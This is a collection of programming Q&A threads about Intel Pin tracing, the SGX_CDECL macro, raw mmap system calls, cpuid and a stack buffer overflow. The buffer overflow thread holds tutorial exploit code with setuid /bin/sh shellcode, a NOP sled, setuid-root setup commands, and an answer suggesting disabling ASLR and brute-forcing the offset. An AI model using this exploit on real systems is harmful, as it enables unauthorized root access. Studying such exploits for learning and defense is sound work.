Why does Pin count only three blocks in a trace? - c++

I want to list all traces, together with the basic blocks they contain, using Intel Pin. However, no trace in my output ever has more than three blocks, although I expected more. Why is that? Thanks in advance!
#include "pin.H"
#include <stdio.h>
using namespace std;
FILE* traceFile;
UINT32 traceNumber = 0;
VOID Trace(TRACE trace, VOID* v)
{
UINT32 blockNumber = 0;
// print trace info
fprintf(traceFile, "Trace [%d]: %p, number of blocks: %d\n", traceNumber, TRACE_Address(trace), TRACE_NumBbl(trace));
for (BBL bbl = TRACE_BblHead(trace); BBL_Valid(bbl); bbl = BBL_Next(bbl))
{
// print block info
fprintf(traceFile, "\nBlock [%d]: %p, insts in block: %d\n\n",
blockNumber, BBL_Address(bbl), BBL_NumIns(bbl));
// print all insts in block
for (INS ins = BBL_InsHead(bbl); INS_Valid(ins); ins = INS_Next(ins))
fprintf(traceFile, "%p: %s\n", INS_Address(ins), INS_Disassemble(ins).c_str());
blockNumber++;
}
fprintf(traceFile, "\nTrace [%d] end. %s", traceNumber,
"\n---------------------------------------------------\n\n");
traceNumber++;
}
void Fini(INT32 code, void* v) {
fclose(traceFile);
}
int main(int argc, char* argv[])
{
traceFile = fopen("itrace.out", "w");
PIN_InitSymbols();
PIN_Init(argc, argv);
TRACE_AddInstrumentFunction(Trace, 0);
PIN_AddFiniFunction(Fini, 0);
PIN_StartProgram();
return 0;
}
For example, there are only three blocks here, although I expected to see more:
Trace [4]: 0x7722de32, number of blocks: 3
Block [0]: 0x7722de32, insts in block: 2
0x7722de32: test eax, eax
0x7722de34: jnz 0x77279708
Block [1]: 0x7722de3a, insts in block: 3
0x7722de3a: movzx eax, byte ptr [0x7ffe0384]
0x7722de41: test eax, eax
0x7722de43: jnz 0x7727971d
Block [2]: 0x7722de49, insts in block: 2
0x7722de49: cmp dword ptr [ebp-0x24], ebx
0x7722de4c: jnz 0x7722de5b
Trace [4] end.
---------------------------------------------------
Shouldn't there be 5 blocks here? Apparently, I don’t understand something about blocks and traces. I didn’t see anywhere in the logs that the number of blocks in traces is more than three, for some reason.
In the debugger I see at least 4 blocks.

Related

What is the SGX_CDECL macro?

I'm trying to understand how to create my own SGX application, so I'm scrutinizing the SDK samples.
I'd like to know what SGX_CDECL is used for, both in the sample below and in general.
/* Application entry */
int SGX_CDECL main(int argc, char *argv[])
{
(void)(argc);
(void)(argv);
/* Initialize the enclave */
if(initialize_enclave() < 0){
printf("Enter a character before exit ...\n");
getchar();
return -1;
}
/* Utilize edger8r attributes */
edger8r_array_attributes();
edger8r_pointer_attributes();
edger8r_type_attributes();
edger8r_function_attributes();
/* Utilize trusted libraries */
ecall_libc_functions();
ecall_libcxx_functions();
ecall_thread_functions();
/* Destroy the enclave */
sgx_destroy_enclave(global_eid);
printf("Info: SampleEnclave successfully returned.\n");
printf("Enter a character before exit ...\n");
getchar();
return 0;
}
Have a look at https://en.wikipedia.org/wiki/X86_calling_conventions#cdecl
In cdecl, subroutine arguments are passed on the stack. Integer values and memory addresses are returned in the EAX register, floating point values in the ST0 x87 register. Registers EAX, ECX, and EDX are caller-saved, and the rest are callee-saved.
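To illustrate how a macro of this kind is typically used, here is a minimal sketch. DEMO_CDECL and add_three are hypothetical names made up for this example; the assumption is that such a macro expands to a compiler-specific calling-convention keyword on 32-bit x86 and to nothing on platforms that have only one convention. Whether SGX_CDECL is defined exactly this way is not confirmed here, so check the SDK headers.

```cpp
// DEMO_CDECL is a hypothetical macro for this sketch, not the SDK's definition.
#if defined(_MSC_VER) && defined(_M_IX86)
#  define DEMO_CDECL __cdecl                  // MSVC targeting 32-bit x86
#elif defined(__GNUC__) && defined(__i386__)
#  define DEMO_CDECL __attribute__((cdecl))   // GCC/Clang targeting 32-bit x86
#else
#  define DEMO_CDECL                          // elsewhere: expands to nothing
#endif

// The annotation sits between the return type and the function name,
// the same position SGX_CDECL occupies in the sample's main().
int DEMO_CDECL add_three(int a, int b, int c)
{
    return a + b + c;
}
```

Calling add_three(1, 2, 3) looks the same to the caller whichever branch is taken; only the way the compiler passes the arguments can differ.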

Tracking native instructions in Intel PIN [duplicate]

I am using the Intel PIN tool to do some analysis on the assembly instructions of a C program. I have a simple C program which prints "Hello World", which I have compiled and generated an executable. I have the assembly instruction trace generated from gdb like this-
Dump of assembler code for function main:
0x0000000000400526 <+0>: push %rbp
0x0000000000400527 <+1>: mov %rsp,%rbp
=> 0x000000000040052a <+4>: mov $0x4005c4,%edi
0x000000000040052f <+9>: mov $0x0,%eax
0x0000000000400534 <+14>: callq 0x400400 <printf@plt>
0x0000000000400539 <+19>: mov $0x0,%eax
0x000000000040053e <+24>: pop %rbp
0x000000000040053f <+25>: retq
End of assembler dump.
I ran a pintool where I gave the executable as an input, and I am doing an instruction trace and printing the number of instructions. I wish to trace the instructions which are from my C program and probably get the machine opcodes and do some kind of analysis. I am using a C++ PIN tool to count the number of instructions-
#include "pin.H"
#include <iostream>
#include <stdio.h>
UINT64 icount = 0;
using namespace std;
//====================================================================
// Analysis Routines
//====================================================================
void docount(THREADID tid) {
icount++;
}
//====================================================================
// Instrumentation Routines
//====================================================================
VOID Instruction(INS ins, void *v) {
INS_InsertCall(ins, IPOINT_BEFORE, (AFUNPTR)docount, IARG_THREAD_ID, IARG_END);
}
VOID Fini(INT32 code, VOID *v) {
printf("count = %ld\n",(long)icount);
}
INT32 Usage() {
PIN_ERROR("This Pintool failed\n"
+ KNOB_BASE::StringKnobSummary() + "\n");
return -1;
}
int main(int argc, char *argv[]) {
if (PIN_Init(argc, argv)) return Usage();
PIN_InitSymbols();
PIN_AddInternalExceptionHandler(ExceptionHandler,NULL);
INS_AddInstrumentFunction(Instruction, 0);
PIN_AddFiniFunction(Fini, 0);
PIN_StartProgram();
return 0;
}
When I run my hello world program with this tool, I get icount = 81563. I understand that PIN adds its own instructions for analysis, but I don't understand how it adds so many when my C program has no more than 10 instructions. Also, is there a way to tell apart the assembly instructions that come from my code and the ones generated by PIN? I can't find any way to differentiate between them. Please help!
You're not measuring what you think you're measuring. See my answer here for details:
What instructions 'instCount' Pin tool counts?
Pin does not count its own instructions. The large count is the result of preparation before and after main() and the call to printf().
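One way to restrict the count to your own code is to filter on the address range of the main executable. The sketch below only models that filtering logic in plain C++; ImageRange, in_image and count_in_image are hypothetical names, and the addresses in the usage note are made up. In a real Pin tool the bounds could be taken from IMG_LowAddress and IMG_HighAddress of the image for which IMG_IsMainExecutable returns true (treating the high address as inclusive is an assumption here).

```cpp
#include <cstdint>
#include <vector>

// Hypothetical description of where the main executable is mapped.
struct ImageRange {
    std::uint64_t low;   // first address of the image
    std::uint64_t high;  // last address of the image (assumed inclusive)
};

// True if addr lies inside the image.
bool in_image(const ImageRange& img, std::uint64_t addr)
{
    return addr >= img.low && addr <= img.high;
}

// Count only the executed addresses that belong to the image.
std::uint64_t count_in_image(const ImageRange& img,
                             const std::vector<std::uint64_t>& executed)
{
    std::uint64_t n = 0;
    for (std::uint64_t addr : executed) {
        if (in_image(img, addr)) {
            ++n;
        }
    }
    return n;
}
```

With an image range of 0x400000 to 0x400fff, the addresses 0x400526 and 0x40053f from the gdb listing would be counted, while an address inside a shared library such as 0x7ffff7a52000 would not.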

mmap system call returning -14(-EFAULT??)

I am implementing an mmap function using a system call. (I have my reasons for implementing mmap manually.)
But I am getting the return value -14 (-EFAULT, I checked with GDB) with this message:
WARN Nar::Mmap: Memory allocation failed.
Here is function:
void *Mmap(void *Address, size_t Length, int Prot, int Flags, int Fd, off_t Offset) {
MmapArgument ma;
ma.Address = (unsigned long)Address;
ma.Length = (unsigned long)Length;
ma.Prot = (unsigned long)Prot;
ma.Flags = (unsigned long)Flags;
ma.Fd = (unsigned long)Fd;
ma.Offset = (unsigned long)Offset;
void *ptr = (void *)CallSystem(SysMmap, (uint64_t)&ma, Unused, Unused, Unused, Unused);
int errCode = (int)ptr;
if(errCode < 0) {
Print("WARN Nar::Mmap: Memory allocation failed.\n");
return NULL;
}
return ptr;
}
I wrote a macro (to be used like the malloc() function):
#define Malloc(x) Mmap(0, x, PROT_READ | PROT_WRITE, MAP_PRIVATE | MAP_ANONYMOUS, -1, 0)
and I used it like this:
Malloc(45);
I looked at the man page. I couldn't find anything about EFAULT on the mmap man page, but I found something about EFAULT on the mmap2 man page.
EFAULT Problem with getting the data from user space.
I think this means something is wrong with passing the struct to the system call.
But I believe nothing is wrong with my struct:
struct MmapArgument {
unsigned long Address;
unsigned long Length;
unsigned long Prot;
unsigned long Flags;
unsigned long Fd;
unsigned long Offset;
};
Maybe something is wrong with how I handle the result value?
Opening a file (which doesn't exist) with CallSystem gave me -2 (-ENOENT), which is correct.
EDIT: Full source of CallSystem. open, write and close work, but mmap (or old_mmap) does not.
All of the arguments were passed correctly.
section .text
global CallSystem
CallSystem:
mov rax, rdi ;RAX
mov rbx, rsi ;RBX
mov r10, rdx
mov r11, rcx
mov rcx, r10 ;RCX
mov rdx, r11 ;RDX
mov rsi, r8 ;RSI
mov rdi, r9 ;RDI
int 0x80
mov rdx, 0 ;Upper 64bit
ret ;Return
It is unclear why you are calling mmap via your CallSystem function; I'll assume it is a requirement of your assignment.
The main problem with your code is that you are using int 0x80. This will only work if all the addresses passed to int 0x80 can be expressed in a 32-bit integer. That isn't the case in your code. This line:
MmapArgument ma;
places your structure on the stack. In 64-bit code the stack is at the top end of the user address space, well beyond what can be represented in a 32-bit address. Usually the bottom of the stack is somewhere in the region of 0x00007FFFFFFFFFFF. int 0x80 only works on the bottom half of the 64-bit registers, so stack-based addresses effectively get truncated, resulting in an incorrect address. To make proper 64-bit system calls it is preferable to use the syscall instruction.
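The truncation can be modelled in a few lines of C++. This is only a sketch of the arithmetic, not of the kernel entry path; seen_by_int80 and fits_in_32_bits are hypothetical helper names, and the stack address used in the usage note is a made-up but typical value.

```cpp
#include <cstdint>

// Model what the int 0x80 path sees: only the low 32 bits of a register.
std::uint64_t seen_by_int80(std::uint64_t reg)
{
    return static_cast<std::uint32_t>(reg);
}

// True if a pointer value survives the truncation unchanged.
bool fits_in_32_bits(std::uint64_t addr)
{
    return seen_by_int80(addr) == addr;
}
```

For a stack address such as 0x00007FFFFFFFE2A0 the kernel would be handed 0xFFFFE2A0, which does not point at the MmapArgument structure, hence the -EFAULT. A low address such as 0x00400526 passes through unchanged, which fits the observation that some calls happened to work.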
The 64-bit System V ABI has a section on the general mechanism for the syscall interface in section A.2.1 AMD64 Linux Kernel Conventions. It says:
User-level applications use as integer registers for passing the sequence %rdi, %rsi, %rdx, %rcx, %r8 and %r9. The kernel interface uses %rdi,
%rsi, %rdx, %r10, %r8 and %r9.
A system-call is done via the syscall instruction. The kernel destroys
registers %rcx and %r11.
We can create a simplified version of your CallSystem code by placing the syscallnum as the last parameter. As the 7th parameter it will be the first and only value passed on the stack. We can move that value from the stack into RAX to be used as the system call number. The first 6 values are passed in the registers, and with the exception of RCX we can simply keep all the registers as-is. RCX has to be moved to R10 because the 4th parameter differs between a normal function call and the Linux kernel SYSCALL convention.
Some simplified code for demonstration purposes could look like:
global CallSystem
section .text
CallSystem:
mov rax, [rsp+8] ; CallSystem 7th arg is 1st val passed on stack
mov r10, rcx ; 4th argument passed to syscall in r10
; RDI, RSI, RDX, R8, R9 are passed straight through
; to the syscall because they match the inputs to CallSystem
syscall
ret
The C++ could look like:
#include <stdlib.h>
#include <sys/mman.h>
#include <stdint.h>
#include <iostream>
using namespace std;
extern "C" uint64_t CallSystem (uint64_t arg1, uint64_t arg2,
uint64_t arg3, uint64_t arg4,
uint64_t arg5, uint64_t arg6,
uint64_t syscallnum);
int main()
{
uint64_t addr;
addr = CallSystem(static_cast<uint64_t>(NULL), 45,
PROT_READ | PROT_WRITE,
MAP_PRIVATE | MAP_ANONYMOUS,
-1, 0, 0x9);
cout << reinterpret_cast<void *>(addr) << endl;
}
In the case of mmap the syscall is 0x09. That can be found in the file asm/unistd_64.h:
#define __NR_mmap 9
The rest of the arguments are typical of the newer form of mmap. From the manpage:
void *mmap(void *addr, size_t length, int prot, int flags, int fd, off_t offset);
If you run strace on your executable (i.e. strace ./a.out), you should find a line that looks like this if it works:
mmap(NULL, 45, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0x7fed8e7cc000
The return value will differ, but it should match what the demonstration program displays.
You should be able to adapt this code to what you are doing. This should at least be a reasonable starting point.
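When adapting it, note that a raw Linux system call reports failure by returning -errno, that is, a value between -4095 and -1. Checking the result after casting it to int, as the question's Mmap does, can misfire, because a valid 64-bit address may have its bit 31 set. A minimal sketch of a safer check follows; is_syscall_error and syscall_errno are hypothetical helper names.

```cpp
#include <cstdint>

// A raw syscall result is an error if it lies in [-4095, -1] when read
// as a signed value, i.e. in the top 4095 values of the unsigned range.
bool is_syscall_error(std::uint64_t raw)
{
    return raw >= static_cast<std::uint64_t>(-4095);
}

// Returns the errno value for a failed call, or 0 for success.
int syscall_errno(std::uint64_t raw)
{
    return is_syscall_error(raw)
               ? static_cast<int>(-static_cast<std::int64_t>(raw))
               : 0;
}
```

With this check the -14 from the question decodes to errno 14 (EFAULT), while an address like the 0x7fed8e7cc000 shown by strace is treated as success.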
If you want to pass the syscallnum as the first parameter to CallSystem, you will have to modify the assembly code to move all the registers so that they line up between the function call convention and the syscall convention. I leave that as a simple exercise to the reader. Doing so will yield considerably less efficient code.
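If hand-written assembly is not a hard requirement, the C library's generic syscall() wrapper already takes the system call number first and does the register shuffling for you. This swaps in a different technique from the assembly above. The sketch assumes x86-64 Linux with a libc that defines SYS_mmap; map_anonymous is a hypothetical helper name.

```cpp
#include <sys/mman.h>
#include <sys/syscall.h>
#include <unistd.h>
#include <cstddef>

// Map `length` bytes of private anonymous memory through syscall().
// Returns nullptr on failure (syscall() then returns -1 and sets errno).
void* map_anonymous(std::size_t length)
{
    long ret = syscall(SYS_mmap,
                       static_cast<void*>(nullptr),              // addr: let the kernel choose
                       length,
                       static_cast<long>(PROT_READ | PROT_WRITE),
                       static_cast<long>(MAP_PRIVATE | MAP_ANONYMOUS),
                       -1L,                                      // fd: none for anonymous maps
                       0L);                                      // offset
    if (ret == -1) {
        return nullptr;
    }
    return reinterpret_cast<void*>(ret);
}
```

A call such as map_anonymous(45) corresponds to the Malloc(45) from the question; the memory should later be released with munmap().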

Buffer overflow exploit not working on gcc

I was trying to run this buffer overflow exploit against the vulnerable program vuln.c, compiled with gcc (I found this in a tutorial; the code is not mine). The shellcode spawns a shell.
exploit.c code
#include <stdlib.h>
char shellcode[] =
"\x31\xc0\xb0\x46\x31\xdb\x31\xc9\xcd\x80\xeb\x16\x5b\x31\xc0"
"\x88\x43\x07\x89\x5b\x08\x89\x43\x0c\xb0\x0b\x8d\x4b\x08\x8d"
"\x53\x0c\xcd\x80\xe8\xe5\xff\xff\xff\x2f\x62\x69\x6e\x2f\x73"
"\x68";
unsigned long sp(void) // This is just a little function
{ __asm__("movl %esp, %eax");} // used to return the stack pointer
int main(int argc, char *argv[])
{
int i, offset;
long esp, ret, *addr_ptr;
char *buffer, *ptr;
offset = 0; // Use an offset of 0
esp = sp(); // Put the current stack pointer into esp
ret = esp - offset; // We want to overwrite the ret address
printf("Stack pointer (ESP) : 0x%x\n", esp);
printf(" Offset from ESP : 0x%x\n", offset);
printf("Desired Return Addr : 0x%x\n", ret);
// Allocate 600 bytes for buffer (on the heap)
buffer = malloc(600);
// Fill the entire buffer with the desired ret address
ptr = buffer;
addr_ptr = (long *) ptr;
for(i=0; i < 600; i+=4)
{ *(addr_ptr++) = ret; }
// Fill the first 200 bytes of the buffer with NOP instructions
for(i=0; i < 200; i++)
{ buffer[i] = '\x90'; }
// Put the shellcode after the NOP sled
ptr = buffer + 200;
for(i=0; i < strlen(shellcode); i++)
{ *(ptr++) = shellcode[i]; }
// End the string
buffer[600-1] = 0;
// Now call the program ./vuln with our crafted buffer as its argument
execl("./vuln", "vuln", buffer, 0);
// Free the buffer memory
free(buffer);
return 0;
}
This exploit is for the vulnerable code vuln.c:
int main(int argc, char *argv[])
{
char buffer[500];
strcpy(buffer, argv[1]);
return 0;
}
But when I run it using ./exploit, it gives a segmentation fault instead of opening the shell. I used the commands:
sudo chown root vuln
sudo chmod +s vuln
ls -l vuln
gcc -fno-stack-protector -o vuln vuln.c
./vuln
gcc -o exploit exploit.c
./exploit
It shows the result:
(gdb) run
Starting program: /home/a/exploit
Stack pointer (ESP) : 0xbffff338
Offset from ESP : 0x0
Desired Return Addr : 0xbffff338
process 4669 is executing new program: /home/a/vuln
Program received signal SIGSEGV, Segmentation fault.
0xbffff338 in ?? ()
(gdb) info registers
eax 0x0 0
ecx 0xbfe3f5a0 -1075579488
edx 0xbfe3dca8 -1075585880
ebx 0xb76e4ff4 -1217507340
esp 0xbfe3dc60 0xbfe3dc60
ebp 0xbffff338 0xbffff338
esi 0x0 0
edi 0x0 0
eip 0xbffff338 0xbffff338
eflags 0x10246 [ PF ZF IF RF ]
cs 0x73 115
ss 0x7b 123
ds 0x7b 123
es 0x7b 123
fs 0x0 0
gs 0x33 51
(gdb)
Please tell me where the problem lies...
Your problem lies in the address you are jumping to.
That exploit does not use memory leaks, so it is meant to be run on a system that does not have ASLR enabled.
Once ASLR is disabled on your system, you may still have to run the exploit several times before the jump lands on the right shellcode address.
The function sp() returns the value of esp in the exploit process, but that value can differ depending on the call stack and the process, so you will have to adjust it step by step until you reach the right address.
Conclusion:
disable ASLR
add an offset that is incremented on each run and apply it to the esp value before it is used
Good luck!

How do I call "cpuid" in Linux?

While writing new code for Windows, I stumbled upon _cpuinfo() from the Windows API. As I am mainly dealing with a Linux environment (GCC) I want to have access to the CPUInfo.
I have tried the following:
#include <iostream>
int main()
{
int a, b;
for (a = 0; a < 5; a++)
{
__asm ( "mov %1, %%eax; " // a into eax
"cpuid;"
"mov %%eax, %0;" // eax into b
:"=r"(b) // output
:"r"(a) // input
:"%eax","%ebx","%ecx","%edx" // clobbered register
);
std::cout << "The CPUID level " << a << " gives EAX= " << b << '\n';
}
return 0;
}
This uses assembly, but I don't want to re-invent the wheel. Is there any other way to implement CPUInfo without assembly?
Since you are compiling with GCC, you can include cpuid.h, which declares these functions:
/* Return highest supported input value for cpuid instruction. ext can
be either 0x0 or 0x8000000 to return highest supported value for
basic or extended cpuid information. Function returns 0 if cpuid
is not supported or whatever cpuid returns in eax register. If sig
pointer is non-null, then first four bytes of the signature
(as found in ebx register) are returned in location pointed by sig. */
unsigned int __get_cpuid_max (unsigned int __ext, unsigned int *__sig)
/* Return cpuid data for requested cpuid level, as found in returned
eax, ebx, ecx and edx registers. The function checks if cpuid is
supported and returns 1 for valid cpuid information or 0 for
unsupported cpuid level. All pointers are required to be non-null. */
int __get_cpuid (unsigned int __level,
unsigned int *__eax, unsigned int *__ebx,
unsigned int *__ecx, unsigned int *__edx)
You don't need to, and should not, re-implement this functionality.
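As a minimal sketch of how __get_cpuid from cpuid.h might be used, the function below reads leaf 0 and assembles the vendor string from EBX, EDX and ECX, in that order. cpu_vendor is a hypothetical helper name, and the code assumes GCC or Clang targeting x86.

```cpp
#include <cpuid.h>
#include <cstring>
#include <string>

// Returns the 12-character CPU vendor string, or an empty string if
// __get_cpuid reports that leaf 0 is not available.
std::string cpu_vendor()
{
    unsigned int eax = 0, ebx = 0, ecx = 0, edx = 0;
    if (!__get_cpuid(0, &eax, &ebx, &ecx, &edx)) {
        return std::string();
    }
    char vendor[12];
    std::memcpy(vendor + 0, &ebx, 4);  // first four characters
    std::memcpy(vendor + 4, &edx, 4);  // middle four characters
    std::memcpy(vendor + 8, &ecx, 4);  // last four characters
    return std::string(vendor, sizeof vendor);
}
```

Printing cpu_vendor() with std::cout replaces the inline-assembly loop for this particular leaf; other leaves can be queried the same way by changing the first argument.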
for (a =0; a < 5; ++a;)
There should only be two semicolons there. You've got three.
This is basic C/C++ syntax; the CPUID is a red herring.